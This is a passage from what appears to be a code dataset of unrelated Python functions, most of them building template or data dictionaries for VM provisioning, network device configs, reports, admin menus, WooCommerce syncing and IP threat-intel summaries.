pass to the template\n vm_data['ip_addresses'].reverse()\n ip_addresses = []\n subnets = []\n for ip in vm_data['ip_addresses']:\n if IPAddress(ip['address']).is_private():\n ip_addresses.append(ip)\n subnets.append({\n 'address_range': ip['subnet']['address_range'],\n 'vlan': ip['subnet']['vlan'],\n 'id': ip['subnet']['id'],\n })\n # Removing duplicates\n subnets = [dict(tuple_item) for tuple_item in {tuple(subnet.items()) for subnet in subnets}]\n # sorting nics (each subnet is one nic)\n for subnet in subnets:\n non_default_ips = []\n gateway, netmask_int = subnet['address_range'].split('/')\n vlan = str(subnet['vlan'])\n data['vlans'].append(vlan)\n\n for ip_address in ip_addresses:\n address = ip_address['address']\n if ip_address['subnet']['id'] == subnet['id']:\n # Pick the default ips if any\n if vm_data['gateway_subnet'] is not None:\n if subnet['id'] == vm_data['gateway_subnet']['id']:\n data['default_ips'].append(address)\n data['default_gateway'] = gateway\n data['default_netmask_int'] = netmask_int\n data['default_vlan'] = vlan\n continue\n # else store the non gateway subnet ips\n non_default_ips.append(address)\n\n if len(non_default_ips) > 0:\n data['ip_addresses'].append({\n 'ips': non_default_ips,\n 'gateway': gateway,\n 'netmask_int': netmask_int,\n 'vlan': vlan,\n })\n\n # Add locale data to the VM\n data['language'] = 'en_IE'\n data['timezone'] = 'GMT Standard Time'\n\n # Get the host name of the server\n host_name = None\n for interface in vm_data['server_data']['interfaces']:\n if interface['enabled'] is True and interface['ip_address'] is not None:\n if IPAddress(str(interface['ip_address'])).version == 6:\n host_name = interface['hostname']\n break\n if host_name is None:\n error = f'Host name is not found for the server # {vm_data[\"server_id\"]}'\n Windows.logger.error(error)\n vm_data['errors'].append(error)\n return None\n\n # Add the host information to the data\n data['host_name'] = host_name\n data['network_drive_url'] = settings.NETWORK_DRIVE_URL\n data['vms_path'] = settings.HYPERV_VMS_PATH\n\n return data", "def dict(self):\n d = {}\n d['template_id'] = self.id\n d['name'] = self.name\n d['cpu'] = self.cpu\n d['memory'] = self.memory\n d['points'] = self.points\n d['description'] = self.description\n d['ec2name'] = self.ec2name\n # state is not put in dictionary\n return d", "def _get_template_data(snapshot_data: Dict[str, Any], span: Span) -> Optional[Dict[str, Any]]:\n snapshot_id = snapshot_data['id']\n Linux.logger.debug(f'Compiling template data for Snapshot #{snapshot_id}')\n data: Dict[str, Any] = {key: None for key in Linux.template_keys}\n\n data['host_sudo_passwd'] = settings.NETWORK_PASSWORD\n data['snapshot_identifier'] = f'{snapshot_data[\"vm\"][\"id\"]}_{snapshot_data[\"id\"]}'\n data['vm_identifier'] = f'{snapshot_data[\"vm\"][\"project\"][\"id\"]}_{snapshot_data[\"vm\"][\"id\"]}'\n\n # Get the ip address of the host\n host_ip = None\n for interface in snapshot_data['server_data']['interfaces']:\n if interface['enabled'] is True and interface['ip_address'] is not None:\n if IPAddress(str(interface['ip_address'])).version == 6:\n host_ip = interface['ip_address']\n break\n if host_ip is None:\n error = f'Host ip address not found for the server # {snapshot_data[\"vm\"][\"server_id\"]}'\n Linux.logger.error(error)\n snapshot_data['errors'].append(error)\n return None\n data['host_ip'] = host_ip\n return data", "def _vm_templates(self, vm, log=None):\n vm_kwargs = self._vm_kwargs(vm)\n tids = self._get_templates(vm_kwargs, django_settings._MON_ZABBIX_TEMPLATES_VM, log=log)\n tids.update(self._get_vm_nic_templates(vm, vm_kwargs, django_settings._MON_ZABBIX_TEMPLATES_VM_NIC, log=log))\n tids.update(self._get_vm_disk_templates(vm, vm_kwargs, django_settings._MON_ZABBIX_TEMPLATES_VM_DISK, log=log))\n\n return tids", "def _get_template_data(self):\n self._set_meta_info()\n if self._report_key == ReportTypes.SEARCH_TOC_REPORT:\n self._set_selected()\n elif self._report_key == ReportTypes.MHR_COVER:\n self._report_data['cover'] = report_utils.set_cover(self._report_data)\n self._report_data['createDateTime'] = Report._to_report_datetime(self._report_data['createDateTime'])\n elif self._report_key == ReportTypes.MHR_REGISTRATION_COVER:\n self._report_data['regCover'] = report_utils.set_registration_cover(self._report_data)\n self._report_data['createDateTime'] = Report._to_report_datetime(self._report_data['createDateTime'])\n if str(self._report_data.get('registrationType', '')).startswith('TRAN'):\n self._report_data['documentDescription'] = \\\n TO_TRANSFER_DESC.get(self._report_data.get('registrationType'))\n elif self._report_data.get('registrationType', '') == MhrRegistrationTypes.REG_NOTE:\n self._report_data['documentDescription'] = self._report_data['note'].get('documentDescription', '')\n else:\n if self._report_key == ReportTypes.SEARCH_DETAIL_REPORT:\n self._set_search_additional_message()\n elif self._report_key == ReportTypes.MHR_TRANSFER:\n self._report_data['documentDescription'] = \\\n TO_TRANSFER_DESC.get(self._report_data.get('registrationType'))\n elif self._report_data.get('registrationType', '') == MhrRegistrationTypes.REG_NOTE:\n self._report_data['documentDescription'] = self._report_data['note'].get('documentDescription', '')\n self._set_date_times()\n self._set_addresses()\n self._set_owner_groups()\n if self._report_key not in (ReportTypes.MHR_REGISTRATION,\n ReportTypes.MHR_TRANSFER,\n ReportTypes.MHR_TRANSPORT_PERMIT):\n self._set_notes()\n if self._report_key == ReportTypes.SEARCH_DETAIL_REPORT:\n self._set_selected()\n self._set_ppr_search()\n elif self._report_key == ReportTypes.SEARCH_BODY_REPORT:\n # Add PPR search template setup here:\n self._set_ppr_search()\n if self._report_key not in (ReportTypes.MHR_TRANSFER, ReportTypes.MHR_EXEMPTION, ReportTypes.MHR_NOTE):\n self._set_location()\n if self._report_key != ReportTypes.MHR_TRANSPORT_PERMIT:\n self._set_description()\n return self._report_data", "def prepare_template(self, rest_handler, key=''):\n template_values = {}\n template_values['page_title'] = self.format_title('Edit Question')\n template_values['main_content'] = self.get_form(rest_handler, key=key)\n\n return template_values", "def build_dict(self, user_info):\n if user_info:\n lookup_dict = {\n \"cloud_stats\": {\"title\": \"Cloud Statistics\",\n \"link\": \"/status/cloud\",\n \"is_admin_panel\": True,\n \"template\": \"status/cloud.html\"},\n \"database_stats\": {\"title\": \"Database Information\",\n \"is_admin_panel\": True,\n \"template\": \"apps/database.html\"},\n \"memcache_stats\": {\"title\": \"Global Memcache Statistics\",\n \"is_admin_panel\": True,\n \"template\": \"apps/memcache.html\"},\n \"upload_app\": {\"title\": \"Upload Application\",\n \"link\": \"/apps/new\",\n \"template\": \"apps/new.html\"},\n \"delete_app\": {\"title\": \"Delete Application\",\n \"link\": \"/apps/delete\",\n \"template\": \"apps/delete.html\"},\n \"relocate_app\": {\"title\": \"Relocate Application\",\n \"link\": \"/apps/relocate\",\n \"template\": \"apps/relocate.html\"},\n \"service_accounts\": {\"title\": \"Service Accounts\",\n \"link\": \"/service_accounts\"},\n \"manage_users\": {\"title\": \"Manage Users\",\n \"link\": \"/authorize\",\n \"is_admin_panel\": True,\n \"template\": \"authorize/cloud.html\"},\n \"logging\": {\"title\": \"Log Viewer\",\n \"link\": \"/logs\",\n \"template\": \"logs/main.html\"},\n \"taskqueue\": {\"title\": \"TaskQueue\",\n \"link\": self.get_flower_url()},\n \"pull_queue_viewer\": {\"title\": \"Pull Queue Viewer\",\n \"link\": \"/pull_queue_viewer\"},\n \"cron\": {\"title\": \"Cron\",\n \"link\": \"/cron\",\n \"template\": \"cron/console.html\"},\n \"app_console\": {\"title\": \"Application Statistics\",\n \"template\": \"apps/console.html\",\n \"link\": \"/apps/\"},\n \"datastore_viewer\": {\"title\": \"Datastore Viewer\",\n \"link\": \"/datastore_viewer\"}\n }\n if user_info.can_upload_apps:\n lookup_dict[\"app_management\"] = {\"App Management\":\n [{\"upload_app\": lookup_dict[\n \"upload_app\"]},\n {\"delete_app\": lookup_dict[\n \"delete_app\"]},\n {\"relocate_app\": lookup_dict[\n \"relocate_app\"]},\n {\"service_accounts\": lookup_dict[\n \"service_accounts\"]}]}\n if user_info.is_user_cloud_admin:\n lookup_dict[\"appscale_management\"] = {\"AppScale Management\":\n [{\"cloud_stats\": lookup_dict[\n \"cloud_stats\"]},\n {\"manage_users\": lookup_dict[\n \"manage_users\"]}]}\n if user_info.owned_apps or user_info.is_user_cloud_admin:\n sections = ['taskqueue', 'pull_queue_viewer', 'logging',\n 'app_console', 'cron', 'datastore_viewer']\n lookup_dict[\"debugging_monitoring\"] = {\n \"Debugging/Monitoring\": [{section: lookup_dict[section]}\n for section in sections]\n }\n return lookup_dict\n else:\n return {}", "def create_initial_templates_document() -> Dict[str, Any]:\n return {\n 'schema-version': 'v1', 'document-version': '',\n 'gateway-templates': [], 'service-templates': [],\n }", "def _get_vm_ids_and_names_dict(self):\r\n vm_ids = {}\r\n vm_names = {}\r\n\r\n for content in self.content:\r\n if content['type'].lower() in ('vm', 'virtual machine'):\r\n vm_ids[content['id']] = content['display_name']\r\n vm_names[content['display_name']] = content['id']\r\n\r\n return vm_ids, vm_names", "def get_template_data(cls, pydata, view):\n return dict(previewdata=cls.get_previewdata(pydata),\n content_types=view.content_types,\n title=cls.html_title,\n brandingtitle=cls.html_brandingtitle,\n heading=cls.html_heading)", "def get_data(self, **kwargs):\n\n self.data = {}\n #node_data = ''\n #link_data = ''\n templates_data = self.request_from_server('templates')\n self.templates = templates_data\n project_data = self.request_from_server('projects')\n for project in project_data:\n project_name = project['name']\n if 'project_name' in kwargs:\n if project_name != kwargs['project_name']:\n continue\n\n self.data[project_name] = {}\n self.data[project_name]['project_id'] = project['project_id']\n self.data[project_name]['nodes'] = {}\n node_data = self.request_from_server('projects/{}/nodes'.format(project['project_id']))\n link_data = self.request_from_server('projects/{}/links'.format(project['project_id']))\n for node in node_data:\n node_name = node['name']\n self.data[project_name]['nodes'][node_name] = {}\n self.data[project_name]['nodes'][node_name]['node_id'] = node['node_id']\n self.data[project_name]['nodes'][node_name]['template_id'] = node['template_id']\n self.data[project_name]['nodes'][node_name]['node_type'] = node['node_type']\n self.data[project_name]['nodes'][node_name]['console_port'] = node['console']\n self.data[project_name]['nodes'][node_name]['console_session'] = None\n self.data[project_name]['nodes'][node_name]['x'] = node['x']\n self.data[project_name]['nodes'][node_name]['y'] = node['y']\n self.data[project_name]['nodes'][node_name]['ports'] = {}\n if project['status'] != 'closed':\n self.data[project_name]['nodes'][node_name]['status'] = node['status']\n for port in node['ports']:\n port_name = port['short_name']\n self.data[project_name]['nodes'][node_name]['ports'][port_name] = {}\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['adapter_number'] = port['adapter_number']\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['port_number'] = port['port_number']\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['link_type'] = port['link_type']\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['link_id'] = None\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['in_use'] = False\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['connected_to'] = None\n for link in link_data:\n for link_node in link['nodes']:\n if node['node_id'] == link_node['node_id']:\n if link_node['label']['text'] == port_name:\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['link_id'] = link['link_id']\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['in_use'] = True\n if link['nodes'].index(link_node) == 0:\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['connected_to_id'] = link['nodes'][1]['node_id']\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['connected_to'] = self.get_node_name_from_id(project_name,link['nodes'][1]['node_id'])\n else:\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['connected_to_id'] = link['nodes'][0]['node_id']\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['connected_to'] = self.get_node_name_from_id(project_name,link['nodes'][0]['node_id'])", "def fill_default_attributes(self, template_dictionary, escape_db_operations=False):\n template_dictionary = self._populate_user_and_project(template_dictionary, escape_db_operations)\n template_dictionary = self._populate_message(template_dictionary)\n template_dictionary = self._populate_menu(template_dictionary)\n\n if KEY_ERRORS not in template_dictionary:\n template_dictionary[KEY_ERRORS] = {}\n if KEY_FORM_DATA not in template_dictionary:\n template_dictionary[KEY_FORM_DATA] = {}\n if KEY_SUB_SECTION not in template_dictionary and KEY_SECTION in template_dictionary:\n template_dictionary[KEY_SUB_SECTION] = template_dictionary[KEY_SECTION]\n if KEY_SUBMENU_LIST not in template_dictionary:\n template_dictionary[KEY_SUBMENU_LIST] = None\n\n template_dictionary[KEY_CURRENT_VERSION] = cfg.BASE_VERSION\n return template_dictionary", "def __verify_details(self):\n if self.major[0] not in self.data[self.root]:\n self.data[self.root][self.major[0]] = {}\n for key, value in self.template_data[self.root][self.major[0]].items():\n key, value = self.__verified_details_key_value(key, value)\n self.data[self.root][self.major[0]][key] = self.__verify_values(key, value, self.data[self.root][self.major[0]])", "def get_template_data(self) -> dict:\n template_data = self._get_template_data()\n\n @dataclass\n class FileEntry:\n \"\"\"Provides an entry into manifest object.\"\"\"\n\n name: str\n size: str\n md5: Optional[str]\n\n template_data[\"resource_files\"] = [\n FileEntry(entry.name, convert_size(entry.size), entry.md5)\n for entry in self.resource.get_manifest().entries.values()\n if not entry.name.startswith(\"statistics\")\n and entry.name != \"index.html\"]\n template_data[\"resource_files\"].append(\n FileEntry(\"statistics/\", \"\", \"\"))\n return template_data", "def get_template_variables(hostname: str) -> dict:\n looprun = asyncio.get_event_loop().run_until_complete\n\n nb = NetboxClient(timeout=60)\n nb_dev = looprun(nb.fetch_device(hostname))\n\n # setup API params to retrieve only those items specific to this device.\n # the APIs used share the same parameters :-)\n\n params = dict(device_id=nb_dev[\"id\"], limit=0)\n\n res_intfs, res_ipaddrs, res_site = looprun(\n asyncio.gather(\n nb.get(\"/dcim/interfaces\", params=params),\n nb.get(\"/ipam/ip-addresses\", params=params),\n nb.get(f\"/dcim/sites/{nb_dev['site']['id']}\"),\n )\n )\n\n rp_ipaddr = None\n\n if hostname.endswith(\"rs21\"):\n # need to fetch rs22 loopback0 IP address\n res: Response = looprun(\n nb.get(\n \"/ipam/ip-addresses\",\n params={\"interface\": \"loopback0\", \"device\": hostname[0:3] + \"rs22\"},\n )\n )\n\n res.raise_for_status()\n body = res.json()\n if body[\"count\"] != 1:\n raise RuntimeError(\"RS22 loopback0 IP not found\")\n\n rp_ipaddr = body[\"results\"][0][\"address\"]\n\n looprun(nb.aclose())\n\n intf_recs = res_intfs.json()[\"results\"]\n ipaddr_recs = res_ipaddrs.json()[\"results\"]\n site_rec = res_site.json()\n\n tvars = dict(\n hostname=nb_dev[\"name\"],\n site=nb_dev[\"site\"][\"slug\"],\n ASN=site_rec[\"asn\"],\n INTF_DESC={rec[\"name\"]: rec[\"description\"] for rec in intf_recs},\n INTF_IPADDR={rec[\"interface\"][\"name\"]: rec[\"address\"] for rec in ipaddr_recs},\n )\n\n if not rp_ipaddr:\n rp_ipaddr = tvars[\"INTF_IPADDR\"][\"loopback0\"]\n\n tvars[\"pim_rp_address\"] = rp_ipaddr.split(\"/\")[0]\n\n if (rcd := nb_dev[\"config_context\"]) is not None:\n tvars.update(rcd)\n\n if (lcd := nb_dev[\"local_context_data\"]) is not None:\n tvars.update(lcd)\n\n return tvars", "def make_entity_dict(class_reference, template, partial_dict): \n _data = class_reference.properties()\n for _key in _data:\n _data[_key] = partial_dict.get(_key, template.get(_key, '')) \n return _data", "def process_template(template, data):\n t = Template(template, data)\n t.job = get_current_job()\n t.process()\n\n result = dict(template=template, data=data, result_folder=t.resultdir, log=t.log)\n\n return result", "def prepare_product_variant_dict(self, instance, template, data, basic_detail, update_price,\n update_image, common_log_id, model_id):\n common_log_line_obj = self.env['common.log.lines.ept']\n wcapi = instance.woo_connect()\n variants_to_create = []\n flag = True\n for variant in template.woo_product_ids:\n # var_url = ''\n price = 0.0\n if variant.variant_id:\n info = {'id':variant.variant_id}\n\n if basic_detail:\n weight = self.convert_weight_by_uom(variant.product_id.weight, instance)\n info.update({'sku':variant.default_code, 'weight':str(weight),\n \"manage_stock\":variant.woo_is_manage_stock})\n else:\n attributes = \\\n self.get_product_attribute(template.product_tmpl_id, instance, common_log_id,\n model_id)[0]\n info = self.get_variant_data(variant, instance, False)\n\n if update_image:\n info.update(self.get_variant_image(instance, variant))\n\n if update_price:\n price = instance.woo_pricelist_id.get_product_price(variant.product_id, 1.0,\n partner=False,\n uom_id=variant.product_id.uom_id.id)\n info.update({'regular_price':str(price), 'sale_price':str(price)})\n\n if template.woo_tmpl_id != variant.variant_id:\n if variant.variant_id:\n data.get('variations').append(info)\n else:\n variants_to_create.append(info)\n flag = True\n elif template.woo_tmpl_id == variant.variant_id:\n del data['variations']\n if basic_detail:\n data.update({'sku':variant.default_code,\n \"manage_stock\":variant.woo_is_manage_stock})\n if update_price:\n data.update({'regular_price':str(price), 'sale_price':str(price)})\n flag = True\n\n if data.get('variations'):\n variant_batches = self.prepare_batches(data.get('variations'))\n for woo_variants in variant_batches:\n _logger.info('variations batch processing')\n res = wcapi.post('products/%s/variations/batch' % (data.get('id')),\n {'update':woo_variants})\n _logger.info('variations batch process completed [status: %s]', res.status_code)\n if res.status_code in [200, 201]:\n del data['variations']\n if res.status_code not in [200, 201]:\n message = \"Update Product Variations\\n%s\" % (res.content)\n common_log_line_obj.woo_product_export_log_line(message, model_id,\n common_log_id,\n False)\n if variants_to_create:\n \"\"\"Needed to update the attributes of template for adding new variant, while update\n process.\"\"\"\n _logger.info(\"Updating attributes of %s in Woo..\" % (template.name))\n if data.get(\"variations\"):\n del data['variations']\n data.update({\"attributes\":attributes})\n res = wcapi.put(\"products/%s\" % (data.get(\"id\")), data)\n\n _logger.info(\"Creating variants in Woo..\")\n res = wcapi.post('products/%s/variations/batch' % (data.get('id')),\n {'create':variants_to_create})\n try:\n response = res.json()\n except Exception as e:\n message = \"Json Error : While update products to WooCommerce for instance %s.\" \\\n \" \\n%s\" % (instance.name, e)\n common_log_line_obj.woo_product_export_log_line(message, model_id,\n common_log_id,\n False)\n return data, flag\n for product in response.get(\"create\"):\n if product.get(\"error\"):\n message = \"Update Product \\n%s\" % (product.get(\"error\").get('message'))\n common_log_line_obj.woo_product_export_log_line(message, model_id,\n common_log_id,\n False)\n else:\n variant_id = product.get(\"id\")\n sku = product.get(\"sku\")\n variant = template.woo_product_ids.filtered(lambda x:x.default_code == sku)\n if variant:\n variant.write({\"variant_id\":variant_id, \"exported_in_woo\":True})\n\n self.sync_woo_attribute_term(instance, common_log_id)\n\n return data, flag", "def get_data_to_create_object(self):\n return {}", "def get_json(self):\n data = {}\n data['ip'] = self.ip\n\n try:\n data['country'] = self.processedvtdata[\"country\"]\n except KeyError:\n data['country'] = 'None'\n try:\n data['as'] = self.processedvtdata[\"as_owner\"]\n except KeyError:\n data['as'] = 'None'\n try:\n data['rdns'] = self.processedvtdata[\"self.reversedns\"]\n except KeyError:\n data['rdns'] = 'None'\n try:\n data['label'] = self.expertlabel\n except AttributeError:\n data['label'] = ''\n\n # geodata\n #{\"status\":\"success\",\"country\":\"Yemen\",\"countryCode\":\"YE\",\"region\":\"SA\",\"regionName\":\"Amanat Alasimah\",\"city\":\"Sanaa\",\"zip\":\"\",\"lat\":15.3522,\"lon\":44.2095,\"timezone\":\"Asia/Aden\",\"isp\":\"Public Telecommunication Corporation\",\"org\":\"YemenNet\",\"as\":\"AS30873 Public Telecommunication Corporation\",\"query\":\"134.35.218.63\"}\n if self.geodata:\n data['geodata'] = self.geodata\n \n # vt resolutions. Is a list\n data['vt'] = {}\n try:\n if self.processedvtdata['resolutions'] != 'None':\n data['vt']['resolutions'] = []\n for count, resolution_tuple in enumerate(self.processedvtdata['resolutions']):\n if count >= self.amount_to_print:\n break\n temp = {}\n temp['date'] = resolution_tuple[0]\n temp['domain'] = resolution_tuple[1]\n data['vt']['resolutions'].append(temp)\n except KeyError:\n pass\n\n # vt urls. Is a list\n try:\n if self.processedvtdata['detected_urls'] != 'None':\n data['vt']['detected_urls'] = []\n for count, url_tuple in enumerate(self.processedvtdata['detected_urls']):\n if count >= self.amount_to_print:\n break\n temp = {}\n temp['date'] = url_tuple[0]\n temp['url'] = url_tuple[1][0]\n temp['detections'] = str(url_tuple[1][1]) + '/' + str(url_tuple[1][2])\n data['vt']['detected_urls'].append(temp)\n except KeyError:\n pass\n\n\n # vt detected communicating samples. Is a list\n try:\n if self.processedvtdata['detected_communicating_samples'] != 'None':\n data['vt']['detected_communicating_samples'] = []\n for count, communcating_tuple in enumerate(self.processedvtdata['detected_communicating_samples']):\n if count >= self.amount_to_print:\n break\n temp = {}\n temp['date'] = communcating_tuple[0]\n temp['detections'] = str(communcating_tuple[1][0]) + '/' + str(communcating_tuple[1][1])\n temp['sha256'] = communcating_tuple[1][2]\n data['vt']['detected_communicating_samples'].append(temp)\n except AttributeError:\n pass\n\n # vt detected downloaded samples. Is a list\n try:\n if self.processedvtdata['detected_downloaded_samples'] != 'None':\n data['vt']['detected_downloaded_samples'] = []\n for count, detected_tuple in enumerate(self.processedvtdata['detected_downloaded_samples']):\n if count >= self.amount_to_print:\n break\n temp = {}\n temp['date'] = detected_tuple[0]\n temp['detections'] = str(detected_tuple[1][0]) + '/' + str(detected_tuple[1][1])\n temp['sha256'] = detected_tuple[1][2]\n data['vt']['detected_downloaded_samples'].append(temp)\n except AttributeError:\n pass\n\n # vt referrer downloaded samples. Is a list\n try:\n if self.processedvtdata['detected_referrer_samples'] != 'None':\n data['vt']['detected_referrer_samples'] = []\n for count, referrer_tuple in enumerate(self.processedvtdata['detected_referrer_samples']):\n if count >= self.amount_to_print:\n break\n temp = {}\n temp['sha256'] = referrer_tuple[0]\n temp['detections'] = str(referrer_tuple[1][0]) + '/' + str(referrer_tuple[1][1])\n data['vt']['detected_referrer_samples'].append(temp)\n except AttributeError:\n pass\n\n # pt data\n data['pt'] = {}\n if self.processedptdata:\n count = 0\n data['pt']['passive_dns'] = []\n for result in self.processedptdata_results:\n if count >= self.amount_to_print:\n break\n temp = {}\n temp['lastseen'] = result[0]\n temp['firstseen'] = result[1][0]\n temp['hostname'] = result[1][1]\n data['pt']['passive_dns'].append(temp)\n count += 1\n\n # shodan data\n try:\n if self.shodandata:\n data['shodan'] = self.shodandata\n except AttributeError:\n pass\n\n data = json.dumps(data)\n return data", "def _setup_report_data(self):\n # current_app.logger.debug('Setup report data template starting.')\n template = self._get_template()\n current_app.logger.debug('Setup report data template completed, setup data starting.')\n data = {\n 'reportName': self._get_report_filename(),\n 'template': template,\n 'templateVars': self._get_template_data()\n }\n current_app.logger.debug('Setup report data completed.')\n return data", "def normalize_data(vms, vm_statuses, nics, public_ips):\n normalized_data = {}\n for vm_id in vms:\n vm_data = vms[vm_id]\n name = vm_data['name']\n nic_id = vm_data['nic_id']\n nic_data = nics[nic_id]\n public_ip_id = nic_data['public_ip_id']\n public_ip_data = public_ips[public_ip_id]\n public_ip = public_ip_data['address']\n public_dns_name = public_ip_data['fqdn']\n status = vm_statuses[vm_id]\n source = \"Azure\"\n instance_data = { 'public_ip': public_ip, 'public_dns_name': public_dns_name, 'status': status, 'source': source }\n normalized_data[name] = instance_data\n return normalized_data", "def get_model_template(self, ApiId: str, ModelId: str) -> Dict:\n pass", "def create_system_data():\n system_data = dict()\n system_data['system'] = dict()\n system_data['system']['primary'] = dict()\n system_data['system']['primary']['controllers'] = dict()\n system_data['system']['primary']['controllers']['re0'] = dict()\n system_data['system']['primary']['controllers']['re0']['hostname'] = 'abc'\n system_data['system']['primary']['controllers']['re0']['mgt-ip'] = '1.1.1.1'\n system_data['system']['primary']['controllers']['re0']['osname'] = 'Paragon'\n system_data['system']['primary']['name'] = 'abc'\n system_data['system']['primary']['model'] = 'Paragon'\n system_data['system']['primary']['make'] = 'Calnex'\n system_data['system']['primary']['server-ip'] = '1.1.1.2'\n system_data['system']['primary']['osname'] = 'Paragon'\n return system_data", "def get_crud_template_dict():\n return CRUD_TEMPLATE_DICT", "def gen_compute_data(self):\n\n print \"\\t* Generating combined nova and neutron data\"\n self.init_compute_clients()\n self.compute_data[\"heat_template_version\"] = \"2013-05-23\"\n self.compute_data[\"description\"] = \"Generated Template %s on Project %s\" % \\\n (str(datetime.datetime.now().strftime(\"%A, %d. %B %Y %I:%M%p\")), str(self.tenant_name))\n self.compute_data[\"parameters\"] = {}\n self.compute_data[\"resources\"] = {}\n self.gen_parameters()\n self.gen_resources()\n self.compute_template = self.compute_data", "def prepare_product_variant_dict(self, instance, template, data, basic_detail, update_price,\n update_image, common_log_id, model_id):\n common_log_line_obj = self.env['common.log.lines.ept']\n wc_api = instance.woo_connect()\n variants_to_create = []\n flag = True\n for variant in template.woo_product_ids:\n price = 0.0\n if variant.variant_id:\n info = {'id': variant.variant_id, 'menu_order': variant.sequence}\n # Below are used to set the color in the metadata field.\n product_template_attribute_value = variant.product_id.product_template_attribute_value_ids.filtered(\n lambda attribute: attribute.display_type == 'color') or False\n if product_template_attribute_value and product_template_attribute_value.product_attribute_value_id.html_color:\n meta_data = []\n meta_data.append({'key': 'markersnpens-color-picker',\n 'value': product_template_attribute_value.product_attribute_value_id.html_color})\n info.update({'meta_data': meta_data})\n\n if basic_detail:\n weight = self.convert_weight_by_uom(variant.product_id.weight, instance)\n info.update({'sku': variant.default_code, 'weight': str(weight),\n \"manage_stock\": variant.woo_is_manage_stock})\n else:\n attributes = self.get_product_attribute(template.product_tmpl_id, instance, common_log_id, model_id)[0]\n info = self.get_variant_data(variant, instance, False)\n\n if update_image:\n info.update(self.get_variant_image(instance, variant))\n\n if update_price:\n price = instance.woo_pricelist_id.get_product_price(variant.product_id, 1.0, partner=False,\n uom_id=variant.product_id.uom_id.id)\n info.update({'regular_price': str(price), 'sale_price': str(price)})\n\n if template.woo_tmpl_id != variant.variant_id:\n if variant.variant_id:\n data.get('variations').append(info)\n else:\n variants_to_create.append(info)\n flag = True\n elif template.woo_tmpl_id == variant.variant_id:\n del data['variations']\n if basic_detail:\n data.update({'sku': variant.default_code, \"manage_stock\": variant.woo_is_manage_stock})\n if update_price:\n data.update({'regular_price': str(price), 'sale_price': str(price)})\n flag = True\n\n if data.get('variations'):\n variant_batches = self.prepare_batches(data.get('variations'))\n for woo_variants in variant_batches:\n _logger.info('variations batch processing')\n res = wc_api.post('products/%s/variations/batch' % (data.get('id')), {'update': woo_variants})\n _logger.info('variations batch process completed [status: %s]', res.status_code)\n if res.status_code in [200, 201]:\n del data['variations']\n if res.status_code not in [200, 201]:\n message = \"Update Product Variations\\n%s\" % res.content\n common_log_line_obj.woo_product_export_log_line(message, model_id, common_log_id, False)\n if variants_to_create:\n \"\"\"Needed to update the attributes of template for adding new variant, while update\n process.\"\"\"\n _logger.info(\"Updating attributes of %s in Woo..\" % template.name)\n if data.get(\"variations\"):\n del data['variations']\n data.update({\"attributes\": attributes})\n res = wc_api.put(\"products/%s\" % (data.get(\"id\")), data)\n\n _logger.info(\"Creating variants in Woo..\")\n res = wc_api.post('products/%s/variations/batch' % (data.get('id')), {'create': variants_to_create})\n try:\n response = res.json()\n except Exception as error:\n message = \"Json Error : While update products to WooCommerce for instance %s. \\n%s\" % (\n instance.name, error)\n common_log_line_obj.woo_product_export_log_line(message, model_id, common_log_id, False)\n return data, flag\n for product in response.get(\"create\"):\n if product.get(\"error\"):\n message = \"Update Product \\n%s\" % (product.get(\"error\").get('message'))\n common_log_line_obj.woo_product_export_log_line(message, model_id, common_log_id, False)\n else:\n variant_id = product.get(\"id\")\n variant = template.woo_product_ids.filtered(lambda x: x.default_code == product.get(\"sku\"))\n if variant:\n variant.write({\"variant_id\": variant_id, \"exported_in_woo\": True})\n\n self.sync_woo_attribute_term(instance, common_log_id)\n\n return data, flag", "def _template_data(self):\n return {\"form\": self.form.render()}", "def get_low_use_template_data(self, creator, low_use_instances, instances_scheduled_for_deletion):\n template_data = {\n 'creator': creator,\n 'creator_name': creator.split('@')[0],\n 'instance': []\n }\n\n for instance in low_use_instances:\n if instance['Creator'] is None:\n instance['Creator'] = 'Unknown'\n instance_data = {\n 'instance_id': instance['InstanceID'],\n 'instance_creator': instance['Creator'],\n 'scheduled_for_deletion': False,\n 'cost': instance['Cost'],\n 'average_cpu_usage': instance['AverageCpuUsage'],\n 'average_network_usage': instance['AverageNetworkUsage']\n }\n template_data['instance'].append(instance_data)\n\n for instance in instances_scheduled_for_deletion:\n if instance['Creator'] is None:\n instance['Creator'] = 'Unknown'\n instance_data = {\n 'instance_id': instance['InstanceID'],\n 'instance_creator': instance['Creator'],\n 'scheduled_for_deletion': True,\n 'cost': instance['Cost'],\n 'average_cpu_usage': instance['AverageCpuUsage'],\n 'average_network_usage': instance['AverageNetworkUsage']\n }\n template_data['instance'].append(instance_data)\n\n return template_data", "def generate(self) -> dict:\n user_data = {\n \"merge_proposals\": self._render_merge_proposals(),\n \"bug_reports\": self._render_reported(),\n \"code_reviews\": {},\n }\n for project in self.projects:\n user_data[\"code_reviews\"][\n project.name\n ] = project.render_project_votes_by_user(self.user)\n\n return user_data", "def pre_service_template_create(self, resource_dict):\n pass", "def get_data_to_update_object(self):\n return {}", "def map_to_app_environment_infos(self, app):\n app['environment_infos'] = {}\n app['environment_infos']['security_groups'] = []\n for form_security_group in self.environment_infos.form.security_groups:\n if form_security_group.data:\n security_group = form_security_group.data\n app['environment_infos']['security_groups'].append(security_group)\n\n app['environment_infos']['subnet_ids'] = []\n for form_subnet_id in self.environment_infos.form.subnet_ids:\n if form_subnet_id.data:\n subnet_id = form_subnet_id.data\n app['environment_infos']['subnet_ids'].append(subnet_id)\n\n app['environment_infos']['instance_profile'] = self.environment_infos.form.instance_profile.data\n app['environment_infos']['key_name'] = self.environment_infos.form.key_name.data\n app['environment_infos']['public_ip_address'] = self.environment_infos.form.public_ip_address.data\n\n app['environment_infos']['root_block_device'] = {}\n if self.environment_infos.form.root_block_device_size.data:\n app['environment_infos']['root_block_device'][\n 'size'] = self.environment_infos.form.root_block_device_size.data\n else:\n # default value to prevent low disk space alerts\n block_min_size = 